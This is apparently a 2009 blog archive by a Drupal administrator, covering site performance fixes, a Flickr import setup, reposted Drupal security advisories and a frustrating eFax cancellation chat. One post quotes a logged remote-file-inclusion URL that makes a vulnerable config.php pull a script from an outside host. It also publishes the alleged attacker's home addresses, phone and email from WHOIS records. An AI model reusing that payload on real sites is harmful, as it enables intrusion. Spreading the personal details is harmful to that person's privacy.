Friday, January 30, 2009

Cooling A Hot Drupal Install

We have had problems with the company site for a month now. It's an ongoing seige. What's worse: this is the only Drupal I have that is doing this. Here are some of Drupal's deadly sins playing out:
File stat frenzy: When in doubt, Drupal does check for modules and themes. If does a file system check by looking at certain file directories. We were really getting hung by this because I was being smart and using a theme with a stylesheet not named "style.css"-- this is what Drupal looks for in the themes to define that a theme is a theme. Also, I stored stuff in subdirectories in each of these themes (images and some other CSS files). That's a no-no. Whenever Drupal crawled the themes it would also crawl those subdirectories. There is an architectural problem we have (34 active themes) that is compounded by the two subdirectories per theme; and the absence of a style.css. So, I nuked one of the subdirectories per theme; and I put in an empty style.css to placate the file check.
The modules directory is where we're putting all our modules. A number of developers reccommend putting non-core modules into sites/all/modules. I don't hold for that-- so much so that I disabled the sites/all/modules crawl from the file.inc. By default, it's one of the places to look for files. The file directory scan ignores ".", "..", and "CVS". Swell, but if you store stuff in Subversion, you may have .svn files in your production copy. So, I added ".svn" as a directory to ignore when doing the crawl.
Group sessions: Sessions for us have gone totally mental. When Google, Yahoo or other sites crawl our site, each page view spawns a new session. The session expiry functionality is faulty so these sessions pile up-- the sessions table grows and grows. Session tables in good installs look to have 2000-4000 sessions. Ours has 200,000 records on a good day: most are old, almost all of them are for anonymous users and most of them are shared by six or seven IP addresses. I have tried to prune these when I find the table has grown out of contol. Good luck. Randy Brown has a good piece on how to changes the settings.php file to make short session lifespans. I do not know if this will have a bearing. It hasn't appeared to work which may point to some faulty session end functionality.
Content Types Gone Wild: When in doubt, we add fields and content-types. We have over 500 fields in play. At first I thought I was being all smart: keep the number of fields under control to make consistency. Hah. It turns out that the multi-table joins needed to farm in data elements is a killer: it can tie up two dozen tables. I put the question to people in the Drupal Groups and I have recieved alot of great and productive feedback. Short answer: lots of individual fields is good. The exception: when you're going to pool data (event dates, for example) should have a common data field.
Tidying: I have been going through our themes and modules with an eye on two things: do we need the functionality, do we need the module or the theme? When it's not required I take it out. I know that with the hundreds of modules you can get into a PackRat mindset of gathering modules, but I have to resist that-- I've even tossed Devel when not in active use: the idea is that can re-install when I need it.

The net result: the site is still driving into a wall. This means I get chiding comments about how Drupal is no good at running large sites. I counter that with Popsci.com: it's 10x busier than our site. I also counter it with Joyent's capacity to host VERY active sites. The problem: Joyent may be a little spazzy. Now we're doing Consulting full-time, all the time

Thursday, January 15, 2009

Are CB Maketing and Paypal Hell a bunch of botnet douchebags?

I found this great exploit attempt:

http://[poor site]/includes/config.php?cfg[path][phplib]=http://cbmarketer.com/images/t_pane.jpg/id.txt??


Making a vulnerable site go to http://cbmarketer.com/images/t_pane.jpg/ download an id.txt file to get info on a server; then use spread.txt to suck down the crap to sell an e-book to via email to a bunch of poor characters out there.

Way to go, CBMarketer (aka Gary Pinson)

Registrant:
Gary Pinson
5201 FM 2088
Winnsboro, Texas 75494
United States

(also:
2126 E State Highway 154
Quitman, TX 75783-7190)



View Larger Map

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: CBMARKETER.COM
Created on: 23-Apr-06
Expires on: 23-Apr-09
Last Updated on: 23-Apr-08

Administrative Contact:
Pinson, Gary GPinson@PromoteLink.com
5201 FM 2088
Winnsboro, Texas 75494
United States
(903) 629-7112 Fax -- (903) 342-3326

Technical Contact:
Pinson, Gary GPinson@PromoteLink.com
5201 FM 2088
Winnsboro, Texas 75494
United States
(903) 629-7112 Fax -- (903) 342-3326

Domain servers in listed order:
NS1.MY-WEBSPACE.BIZ
NS2.MY-WEBSPACE.BIZ

[Security announcements] SA-CONTRIB-2009-004 - Notify - Privilege escalation

---- SA-CONTRIB-2009-004 - NOTIFY - PRIVILEGE ESCALATION ----

* Advisory ID: DRUPAL-SA-CONTRIB-2009-004

* Project: Notify

* Versions: 5.x

* Date: 2009-January-15

* Security risk: Moderately critical

* Exploitable from: Remote

* Vulnerability: Privilege escalation

---- DESCRIPTION ----

A user triggering the cron processing of the Notify module may end up getting
logged in as another user when the Notify operations do not complete
succesfully.

---- VERSIONS AFFECTED ----

* Versions of Notify for Drupal 5.x prior to 5.x-1.2

Drupal core is not affected. If you do not use the Notify module, there is
nothing you need to do.

---- SOLUTION ----

Install the latest version.

* If you use Notify for Drupal 5.x upgrade to 5.x-1.2 [
http://drupal.org/node/358495 ]

Also see the Notify project page [ http://drupal.org/project/notify ].

---- REPORTED BY ----

Philippe Jadin and Bill Kennedy

---- CONTACT ----

The security contact for Drupal can be reached at security at drupal.org or via
the form at [ http://drupal.org/contact ] and by selecting the security issues
category.

--
Unsubscribe from this newsletter: http://drupal.org/newsletter/confirm/remove/73ff60b93f11343t44

Wednesday, January 14, 2009

[Security announcements] SA-CORE-2009-001 Drupal core - Multiple vulnerabilities

---- SA-CORE-2009-001 DRUPAL CORE - MULTIPLE VULNERABILITIES ----

* Advisory ID: DRUPAL-SA-CORE-2009-001

* Project: Drupal core

* Versions: 5.x and 6.x

* Date: 2009-January-14

* Security risk: Moderately Critical

* Exploitable from: Remote

* Vulnerability: Multiple vulnerabilities

Multiple vulnerabilities and weaknesses were discovered in Drupal.

---- ACCESS BYPASS ----

The Content Translation module for Drupal 6.x enables users to make a
translation of an existing item of content (a node). In that process the
existing node's content is copied into the new node's submission form.

The module contains a flaw that allows a user with the 'translate content'
permission to potentially bypass normal viewing access restrictions, for example
allowing the user to see the content of unpublished nodes even if they do not
have permission to view unpublished nodes.

This issue only affects Drupal 6.x.

---- VALIDATION BYPASS ----

When user profile pictures are enabled, the default user profile validation
function will be bypassed, possibly allowing invalid user names or e-mail
addresses to be submitted.

This issue only affects Drupal 6.x.

---- HARDENING AGAINST SQL INJECTION ----

A parameter passed into the node access API was not properly escaped or
validated before being used in SQL queries. While there is no direct risk of
SQL injection from Drupal core, it's possible that this could have presented a
risk in combination with a contributed module. Additional validation has been
added to eliminate this risk.

This issue affects both Drupal 5.x and Drupal 6.x.

---- VERSIONS AFFECTED ----

* Drupal 5.x before version 5.15.

* Drupal 6.x before version 6.9.

---- SOLUTION ----

Install the latest version:

* If you are running Drupal 5.x then upgrade to Drupal 5.15 [
http://ftp.drupal.org/files/projects/drupal-5.15.tar.gz ].

* If you are running Drupal 6.x then upgrade to Drupal 6.9 [
http://ftp.drupal.org/files/projects/drupal-6.9.tar.gz ].

If you are unable to upgrade immediately, you can apply a patch to secure your
installation until you are able to do a proper upgrade. The patches fix security
vulnerabilities, but do not contain other fixes which were released in these
versions.

* To patch Drupal 5.14 use SA-CORE-2009-001-5.14.patch [
http://drupal.org/files/sa-core-2009-001/SA-CORE-2009-001-5.14.patch ].

* To patch Drupal 6.8 use SA-CORE-2009-001-6.8.patch [
http://drupal.org/files/sa-core-2009-001/SA-CORE-2009-001-6.8.patch ].

---- REPORTED BY ----

The access bypass issue for translations was reported by Wolfgang Ziegler [
http://drupal.org/user/16747 ].

The validation bypass was reported by v1nce [ http://drupal.org/user/52144 ],
supersmashbrothers [ http://drupal.org/user/241667 ], Tejus Pratap [
http://drupal.org/user/360600 ], and Limiting Factor [
http://drupal.org/user/373498 ].

The need for SQL hardening was reported by Derek Wright [
http://drupal.org/user/46549 ] of the Drupal Security Team.

---- CONTACT ----

The security team for Drupal can be reached at security at drupal.org or via
the form at [ http://drupal.org/contact ].

--
Unsubscribe from this newsletter: http://drupal.org/newsletter/confirm/remove/73ff60b93f11343t44

[Security announcements] SA-CONTRIB-2009-003 - Internationalizaion (i18n) Translation module - Access bypass

---- SA-CONTRIB-2009-003 - INTERNATIONALIZAION (I18N) TRANSLATION MODULE -
ACCESS BYPASS ----

* Advisory ID: DRUPAL-SA-CONTRIB-2009-003

* Project: Internationalization (i18n) (third-party module)

* Version: 5.x-2.x

* Date: 2009-January-14

* Security risk: Less critical

* Exploitable from: Remote

* Vulnerability: Access bypass

---- DESCRIPTION ----

The third-party i18n module enables users to make a translation of an existing
item of content (a node). In that process the existing node's content is copied
into the new node.

The module contains a flaw that allows a user with the 'translate node'
permission to potentially bypass normal viewing access restrictions, for example
allowing the user to see the content of unpublished nodes even if they do not
have permission to view unpublished nodes.

---- VERSIONS AFFECTED ----

* All 5.x versions of Internationalization (i18n) prior to 5.x-2.5.

Drupal core is not affected. If you do not use the contributed
Internationalization (i18n) module, there is nothing you need to do.

---- SOLUTION ----

Install the latest version:

* If you use 5.x-2.x upgrade to Internationalization 5.x-2.5 [
http://drupal.org/node/358986 ].

See also the Internationalization project page [ http://drupal.org/project/i18n
].

---- REPORTED BY ----

Wolfgang Ziegler [ http://drupal.org/user/16747 ] and by Nat Catchpole [
http://drupal.org/user/35733 ] of the Drupal security team.

---- CONTACT ----

The security contact for Drupal can be reached at security at drupal.org or via
the form at [ http://drupal.org/contact ].

--
Unsubscribe from this newsletter: http://drupal.org/newsletter/confirm/remove/73ff60b93f11343t44

Thursday, January 08, 2009

How to hook Flickr to your site via Drupal

I have a Flickr account, a personal site, alot of sad geeky experience with Drupal and a passion for tapping into APIs where I find them. Also, I wouldn't mind monetizing what I am doing. The Flickr module for Drupal is good, but I wanted to take these images and include them on my own site as nodes. Also, I wanted a process that would automatically grab images rather than making me cut and paste images into my site. Beyond this, I wanted to leave this concept open enough that I could pop in media from other sources (like Youtube). This is how to combine these elements into a whole and this may help you if you want to do the same thing.

There are some things you have go out there and find (and some I include below that):
You need to build a content type to support holding and displaying these pieces of gathered content. I built a content-type, Media, to hold a rendered copy of the image and some supporting information. The view of the page is pre-built by my node-save process. I have added a source field to hold a reference to the image; this will be checked when data is imported via the API so that you don't import multiple copies of the same image. To make this easier, I have used the Import/Export capacity to make a copy of the CCK content-type that you can import into your site.

There are TONNES of elements available from the Flickr API. In my example, I grabbed the basics of the image and then I went back and grabbed the "exif" data for these images. The Exif has the potential to hold all of your camera's data: model, resolution, palette information. In my case, I am sniffing out the model information and I have added a field called "ware" in the Media type to hold the hardware and software used to create my images. I have a product search tool tied into Shopping.com. I take this model information, stored in the "ware" field and I used it to make linkage to the shopping.com tie-in.

Next, I built a node template for this content-type. It formats the node and organizes its data. What it also does it make the linkage to the Product Search page using the ware field.

What you can do with this content-type is build a view to display the nodes. I have an export of that node: View. The view can be used as a standalone page; or use a block in a panel or another part of your layout.

How do you get your data from the API? You can build a standalone page with a bootstrap include. Or, you could build a whole module around this action. Personally, I fewer to keep my module count as low as I can get away with-- too many modules and you have a huge weight to pack around when load pages. In my case, I went the easiest route possible: I made a page and added a qualifier so that the import functionality is not easily called. If it is called additional times, the source field should save your bacon-- it will compare the images you already have vs. those seen from the API data. When you execute this code, calling media_node_flickr() will spawn the API call, the duplication check and the node saving.

You can take the code and build on it-- add new fields to the content type, add functionality, mine the API for more information.

Wednesday, January 07, 2009

[Security announcements] SA-CONTRIB-2009-002 - Project issue tracking - Multiple vulnerabilities

---- SA-CONTRIB-2009-002 - PROJECT ISSUE TRACKING - MULTIPLE VULNERABILITIES
----

* Advisory ID: DRUPAL-SA-CONTRIB-2009-002

* Project: Project issue tracking (third-party module)

* Version: 5.x-2.x

* Date: 2009-January-07

* Security risk: Moderately critical

* Exploitable from: Remote

* Vulnerability: Node access bypass, Cross-site scripting (XSS)

---- DESCRIPTION ----

This announcement covers the following two issues for the Project issue
tracking module [ http://drupal.org/project/project_issue ].

* Under certain conditions, users may receive email updates for issues which
they do not have proper access rights to. This issue is mainly a problem for
sites that use a contributed node access module, although it also affects issues
that have been unpublished.

* Malicious users with the "administer projects" permission are able to
inject arbitrary code when adding or editing issue status values. This is only
an issue if you need any role separation between administrators and users with
the "administer projects" permission.

Wikipedia has more information about cross site scripting [
http://en.wikipedia.org/wiki/Cross-site_scripting ] (XSS).

---- VERSIONS AFFECTED ----

* Project issue tracking (project_issue) for Drupal 5.x prior to 5.x-2.3

Drupal core is not affected. If you do not use the contributed Project issue
tracking module, there is nothing you need to do.

---- SOLUTION ----

Install the latest version:

* Project issue tracking 5.x-2.3 [ http://drupal.org/node/355709 ]

See also the Project issue tracking project page [
http://drupal.org/project/project_issue ].

---- REPORTED BY ----

* The access bypass vulnerability was reported by Damien Tournoud [
http://drupal.org/user/22211 ] of the Drupal Security team [
http://drupal.org/security-team ].

* The cross site scripting vulnerability was reported by Derek Wright (dww [
http://drupal.org/user/46549 ]) of the Drupal Security team [
http://drupal.org/security-team ].

---- CONTACT ----

The security contact for Drupal can be reached at security at drupal.org or via
the form at [ http://drupal.org/contact ].

--

[Security announcements] SA-CONTRIB-2009-001 - Project release - Multiple vulnerabilities

---- SA-CONTRIB-2009-001 - PROJECT RELEASE - MULTIPLE VULNERABILITIES ----

* Advisory ID: DRUPAL-SA-CONTRIB-2009-001

* Project: Project release (third-party module)

* Version: 5.x

* Date: 2009-January-07

* Security risk: Highly critical

* Exploitable from: Remote

* Vulnerabilities: Arbitrary file upload, Cross-site scripting (XSS)

---- DESCRIPTION ----

The Project release module is a component within the broader Project [
http://drupal.org/project/project ] module. This announcement covers the
following two issues:

* Project release enables file attachments to create a specific version of
code to be downloaded by users. This module uses its own code to upload files so
the files are not validated by Drupal core's Upload module. The lack of
validation in Project release's upload mechanism enables a user with the
"maintain projects" permission to upload files with arbitrary extensions. Using
these files an attacker can perform cross site scripting attacks, and depending
on the server configuration, may also be able to execute arbitrary code.

Any projects that are associated with a CVS repository using the CVS
integration [ http://drupal.org/project/cvslog ] module are not vulnerable,
though you are still encouraged to upgrade.

Important Note

The steps above will stop malicious files from being uploaded, but will do
nothing to protect your site against files that have already been uploaded. Make
sure to carefully inspect the file system path and check for files with
extensions that should be forbidden. We recommend you remove any HTML file you
did not upload yourself. You should look for script tags, CSS includes,
Javascript includes, and onerror="" attributes if you need to review files
individually.

* The Project release module allows users to create releases of a project
which are then available for download. Users may be able to inject arbitrary
code on error pages produced by the Project release module by using a malformed
URL.

Wikipedia has more information about cross site scripting [
http://en.wikipedia.org/wiki/Cross-site_scripting ] (XSS).

---- VERSIONS AFFECTED ----

* Project for Drupal 5.x prior to 5.x-1.3

Drupal core is not affected. If you do not use the contributed Project release
module, there is nothing you need to do.

---- SOLUTION ----

Install the latest version:

* Project 5.x-1.3 [ http://drupal.org/node/355708 ]

See also the Project module project page [ http://drupal.org/project/project ].


---- REPORTED BY ----

Both vulnerabilities were reported by Adam Light (aclight [
http://drupal.org/user/86358 ]) of the Drupal Security team [
http://drupal.org/security-team ].

---- CONTACT ----

The security contact for Drupal can be reached at security at drupal.org or via
the form at [ http://drupal.org/contact ].

Friday, January 02, 2009

Efax or Ef*cks? Easy to Join. Impossible to leave

I wanted to discontinue my eFax account. I used it three times at $15/month. It was easy sign-up but impossible to leave. Their website suggests calling a number that vaguely looks like a UK number. I tried the US office and called that. The automated system suggested that I go to www.efax.com/cancel. So, I did. That spawned a chat session. The cancellation process was couched as a "review of my request"-- like they could turn down my request to stop using their services? Then I got into a long chat where they tried to keep my account open-- just in case--

Welcome to chat.
The session has been accepted.
{Frank D.} Hello, Mike. Welcome to j2 Global's online support. I am Frank, your Online Live Support Representative. How are you doing today?
{Mike DeWolfe} I am cancelling my eFax account: eFax Number:
1-2X0-483-6X4X
effective as of now. I will put in a note to my credit card company to refuse charges from eFax
{Frank D.} You can have it cancel via this chat session anytime you wish to. Do you wish to discontinue your service today?
{Mike DeWolfe} I wish to discontinue the service today
{Frank D.} I'm sorry to hear that you wish to cancel. Could you please provide me your PIN for verification?
{Mike DeWolfe} XXXXXX
{Frank D.} Thank you for providing your information. Please give me a moment while I go through your records. In the meantime, please type the number corresponding to your reason for cancellation:

1) Moving to another provider
2) Bought a fax machine
3) Business or role changed
4) Short term project completed
5) Financial reasons
6) Problems with faxing or billing
7) Dissatisfied with quality of service
8) Too costly
{Mike DeWolfe} 4) Short term project completed
{Frank D.} Thank you for waiting. I have located and verified your account in our records.
{Frank D.} Mike, I understand that currently you do not need the service. In the current situation, we will waive off the monthly fee for two months. This way you will be able to keep your account, which will enable you to send and receive faxes. You will also be able to use all of our services and re-evaluate it for your faxing needs. Only usage charges are applicable for sending faxes if any. During this period, you will not be charged any monthly fee. We are suggesting this so that you can give it a second thought, as you will not be paying CAD$14.99 for the next 2 billing cycles.
{Frank D.} Your eFax account will be credited with CAD$29.98 so that you may utilize our services without being billed our monthly fee for the next two billing cycles.
{Frank D.} Since you will not be charged any monthly fee for the next two months you could keep the number till then. If at all you find that you need our services during this period, then you will still have the account. If however, you still feel that you do not have any use for our services by the end of this two months credit period, then you can always contact us back anytime. Would that be preferable?
{Mike DeWolfe} Thank you-- I do want to cancel my account, effective as of now. I will put in a note to my credit card company to refuse charges from eFax
{Frank D.} Just to confirm. Do you wish to avail the above offer?
{Mike DeWolfe} I do not. I do want to cancel my account, effective as of now.
{Frank D.} Mike, I completely understand your wish to discontinue, since you have paid for the current month, you can retain this number at least till the end of two months credit offer as you will not be charged any monthly fee for the two months. If however, you still feel that you do not have any use for our services by the end of the two months credit period, then you can always contact us back anytime.
{Frank D.} As a good will gesture, we will offer you an additional gift balance of $10 along with the monthly credit, which will enable to send up to 100 additional fax pages free of cost (per page per minute within US & Canada).
{Frank D.} At the end of the 2 months credit period, you can get back to us immediately without any further obligation to stay back. We are available 24 hours a day and 7 days a week. Please feel free to contact us at any time. We will immediately process your request.
{Mike DeWolfe} Thank you.
{Frank D.} That's Great.
{Frank D.} I am sure that you will have a great experience with eFax & your account will remain open untill we hear from you. Only usage charges are applicable for sending faxes if any.
{Frank D.} Is there anything else I can assist you with at this time?
{Mike DeWolfe} I WANT TO CLOSE MY ACCOUNT. Please do that immediately.
{Frank D.} All right, as per your wish, I will close your account right now. We are sorry that you have decided to leave eFax, we are continuously improving our products and services but if your faxing needs do change in the future, we would be more than happy to have you back. Please do consider us if your faxing needs change in the future. Thank you for being with us and for using our service.
{Frank D.} Is there anything else I can assist you with at this time?
{Mike DeWolfe} No, I have contacted my credit card company and they will return any future charges from eFax, J2, etc. So, we're good.